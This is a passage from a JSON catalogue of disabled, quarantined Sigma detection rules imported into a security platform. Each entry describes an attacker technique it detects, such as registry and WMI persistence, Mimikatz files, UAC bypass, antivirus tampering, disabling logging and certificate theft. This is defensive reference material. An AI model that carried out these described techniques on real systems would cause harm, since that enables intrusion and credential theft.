"sigmahq-sigma-9df5f547-c86a-433e-b533-f2794357e242", "type": "detection", "name": "Classes Autorun Keys Modification", "description": "Detects modification of Windows Registry Classes keys used for persistence.\nAdversaries modify these autostart extensibility points (ASEP) to execute malicious code when file types are opened or actions are performed.\nVarious legitimate software also uses these keys. Currently, this rule only filters out known legitimate software paths,\nthus it is recommended to review and tune filters for your environment to reduce false positives before deploying to production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/classes-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9df5f547-c86a-433e-b533-f2794357e242", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" } }, { "id": "sigmahq-sigma-9e02c8ec-02b9-43e8-81eb-34a475ba7965", "type": "detection", "name": "Network Connection Initiated To BTunnels Domains", "description": "Detects network connections to BTunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-btunnels-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e02c8ec-02b9-43e8-81eb-34a475ba7965", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_btunnels.yml" } }, { "id": "sigmahq-sigma-9e07f6e7-83aa-45c6-998e-0af26efd0a85", "type": "detection", "name": "Powershell WMI Persistence", "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-wmi-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" } }, { "id": "sigmahq-sigma-9e099d99-44c2-42b6-a6d8-54c3545cab29", "type": "detection", "name": "HackTool - Mimikatz Kirbi File Creation", "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-mimikatz-kirbi-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml" } }, { "id": "sigmahq-sigma-9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "type": "detection", "name": "Previously Installed IIS Module Was Removed", "description": "Detects the removal of a previously installed IIS module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/previously-installed-iis-module-was-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_module_removed.yml" } }, { "id": "sigmahq-sigma-9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "type": "detection", "name": "Use Of Hidden Paths Or Files", "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-hidden-paths-or-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml" } }, { "id": "sigmahq-sigma-9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "type": "detection", "name": "New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application", "description": "Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-firewall-rule-added-in-windows-firewall-exception-list-for-potential-suspici.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" } }, { "id": "sigmahq-sigma-9e3357ba-09d4-4fbd-a7c5-ad6386314513", "type": "detection", "name": "Change the Fax Dll", "description": "Detect possible persistence using Fax DLL load when service restart", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-the-fax-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" } }, { "id": "sigmahq-sigma-9e36ed87-4986-482e-8e3b-5c23ffff11bf", "type": "detection", "name": "RemCom Service Installation", "description": "Detects RemCom service installation and execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remcom-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e36ed87-4986-482e-8e3b-5c23ffff11bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml" } }, { "id": "sigmahq-sigma-9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "type": "detection", "name": "Important Scheduled Task Deleted or Disabled", "description": "Detects when adversaries try to stop system services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-scheduled-task-deleted-or-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete_or_disable.yml" } }, { "id": "sigmahq-sigma-9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d", "type": "detection", "name": "Potentially Suspicious File Creation by OpenEDR's ITSMService", "description": "Detects the creation of potentially suspicious files by OpenEDR's ITSMService process.\nThe ITSMService is responsible for remote management operations and can create files on the system through the Process Explorer or file management features.\nWhile legitimate for IT operations, creation of executable or script files could indicate unauthorized file uploads, data staging, or malicious file deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1570", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-creation-by-openedr-s-itsmservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e4b7d3a-6f2c-4e9a-8d1b-3c5e7a9f2b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml" } }, { "id": "sigmahq-sigma-9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "type": "detection", "name": "Msxsl.EXE Execution", "description": "Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.\nAdversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msxsl-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msxsl_execution.yml" } }, { "id": "sigmahq-sigma-9e620995-f2d8-4630-8430-4afd89f77604", "type": "detection", "name": "Potential Active Directory Enumeration Using AD Module - PsScript", "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-enumeration-using-ad-module-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e620995-f2d8-4630-8430-4afd89f77604", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" } }, { "id": "sigmahq-sigma-9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "type": "detection", "name": "Certificate Exported Via PowerShell", "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml" } }, { "id": "sigmahq-sigma-9e8894c0-0ae0-11ef-9d85-1f2942bec57c", "type": "detection", "name": "Suspicious Shell Open Command Registry Modification", "description": "Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.\nGenerally, modifications to the `*\\shell\\open\\command` registry key can indicate an attempt to change the default action for opening files,\nand various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-shell-open-command-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e8894c0-0ae0-11ef-9d85-1f2942bec57c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_shell_open_keys_modification_patterns.yml" } }, { "id": "sigmahq-sigma-9e8f6035-88bf-4a63-96b6-b17c0508257e", "type": "detection", "name": "Cisco Disabling Logging", "description": "Turn off logging locally or remote", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-disabling-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e8f6035-88bf-4a63-96b6-b17c0508257e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_disable_logging.yml" } }, { "id": "sigmahq-sigma-9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "type": "detection", "name": "DLL Load By System Process From Suspicious Locations", "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-load-by-system-process-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_dll_load_system_process.yml" } }, { "id": "sigmahq-sigma-9eb68894-7476-4cd6-8752-23b51f5883a7", "type": "detection", "name": "Bitsadmin to Uncommon TLD", "description": "Detects Bitsadmin connections to domains with uncommon TLDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitsadmin-to-uncommon-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9eb68894-7476-4cd6-8752-23b51f5883a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml" } }, { "id": "sigmahq-sigma-9eb99343-d336-4020-a3cd-67f3819e68ee", "type": "detection", "name": "Account Tampering - Suspicious Failed Logon Reasons", "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-tampering-suspicious-failed-logon-reasons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" } }, { "id": "sigmahq-sigma-9ec9fb1b-e059-4489-9642-f270c207923d", "type": "detection", "name": "Hiding User Account Via SpecialAccounts Registry Key - CommandLine", "description": "Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hiding-user-account-via-specialaccounts-registry-key-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ec9fb1b-e059-4489-9642-f270c207923d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml" } }, { "id": "sigmahq-sigma-9ed5959a-c43c-4c59-84e3-d28628429456", "type": "detection", "name": "UAC Bypass Using Iscsicpl - ImageLoad", "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-iscsicpl-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ed5959a-c43c-4c59-84e3-d28628429456", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" } }, { "id": "sigmahq-sigma-9ef27c24-4903-4192-881a-3adde7ff92a5", "type": "detection", "name": "Renamed Remote Utilities RAT (RURAT) Execution", "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-remote-utilities-rat-rurat-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" } }, { "id": "sigmahq-sigma-9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "type": "detection", "name": "New DLL Registered Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-registered-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml" } }, { "id": "sigmahq-sigma-9f107a84-532c-41af-b005-8d12a607639f", "type": "detection", "name": "Potentially Suspicious Cabinet File Expansion", "description": "Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-cabinet-file-expansion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f107a84-532c-41af-b005-8d12a607639f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" } }, { "id": "sigmahq-sigma-9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "type": "detection", "name": "Microsoft Sync Center Suspicious Network Connections", "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-sync-center-suspicious-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" } }, { "id": "sigmahq-sigma-9f308120-69ed-4506-abde-ac6da81f4310", "type": "detection", "name": "Okta Network Zone Deactivated or Deleted", "description": "Detects when an Network Zone is Deactivated or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-network-zone-deactivated-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f308120-69ed-4506-abde-ac6da81f4310", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_network_zone_deactivated_or_deleted.yml" } }, { "id": "sigmahq-sigma-9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "type": "detection", "name": "Unusual File Modification by dns.exe", "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-modification-by-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" } }, { "id": "sigmahq-sigma-9f38c1db-e2ae-40bf-81d0-5b68f73fb512", "type": "detection", "name": "Suspicious BitLocker Access Agent Update Utility Execution", "description": "Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.\nSuspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-bitlocker-access-agent-update-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f38c1db-e2ae-40bf-81d0-5b68f73fb512", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_baaupdate_susp_child_process.yml" } }, { "id": "sigmahq-sigma-9f4662ac-17ca-43aa-8f12-5d7b989d0101", "type": "detection", "name": "Tamper With Sophos AV Registry Keys", "description": "Detects tamper attempts to sophos av functionality via registry key modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-with-sophos-av-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml" } }, { "id": "sigmahq-sigma-9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "type": "detection", "name": "Potentially Suspicious ASP.NET Compilation Via AspNetCompiler", "description": "Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-asp-net-compilation-via-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 